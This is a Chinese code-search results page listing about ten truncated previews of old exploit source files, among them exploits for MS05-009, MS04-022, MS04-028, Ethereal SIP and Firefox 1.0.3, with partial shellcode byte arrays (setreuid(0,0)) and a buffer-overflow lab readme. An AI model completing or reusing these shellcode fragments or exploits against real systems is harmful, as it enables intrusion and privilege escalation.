代码搜索:Shellcode
找到约 263 项符合「Shellcode」的源代码
代码结果 263
www.eeworm.com/read/253602/12210424
txt ms05009.c.txt
/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit (MS05-009)
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright
www.eeworm.com/read/253602/12210470
txt ethereal 小等0.10.10 sip protocol dissector remote buffer overflow exploit.txt
/* tethereal_sip.c (now quite functional)
*
* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit
* based on the exploit:
* http://www.frsirt.com/exploits/20050511.ethereal_sip_dos.
www.eeworm.com/read/253602/12210595
txt microsoft windows 2k xp task scheduler .job exploit (ms04-022).txt
//*************************************************************
// Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022)
// Proof-of-Concept Exploit for English WinXP SP1
// 15 Jul 2004
www.eeworm.com/read/253602/12210721
txt mozilla firefox 1.0.3 remote arbitrary code execution exploit.txt
/* 4d buffer overflow
Braden Thomas
the buffer is copied byte by byte starting from the beginning of
the buffer
until a NULL byte is reached (or a couple other types of bytes)
the buffer is cop
www.eeworm.com/read/108206/15590987
txt win 2000 xp task scheduler exploit.txt
#include
#include
unsigned char jobfile[] =
"\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x0
www.eeworm.com/read/107062/15613854
txt winjpeg(gdi+)exp_ms04-028.c.txt
// GDI+ buffer overrun exploit by FoToZ
// NB: the headers here are only sample headers taken from a .JPG file,
// with the FF FE 00 01 inserted in header1.
// Sample shellcode is provided
// You
www.eeworm.com/read/422212/10655294
txt readme.txt
【文件说明】
server: 存在缓冲区溢出漏洞的服务端。
client: 可攻击服务端的客户端。
tools: 查询函数"LoadLibraryA"与"system"的地址。
<mark>shellcode</mark>diy: <mark>shellcode</mark>原理的C++描述。
【工作流程】
客户端向服务端发数据,服务端显示收到的数据。
客户端发送数据的更改需要改动client.cpp中的toSend数组。
...
www.eeworm.com/read/159132/10692436
c exploit.c
#include
#include
char shellcode[]=
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\x
www.eeworm.com/read/159132/10692450
c stackexploit1.c
#include
#include
#include
char shellcode[]=
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb
www.eeworm.com/read/242884/6960653
c ie0day.c
#include
#include
#include
FILE *fp = NULL;
char *file = "lukehack.htm";
char *url = NULL;
unsigned char sc[] =
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x0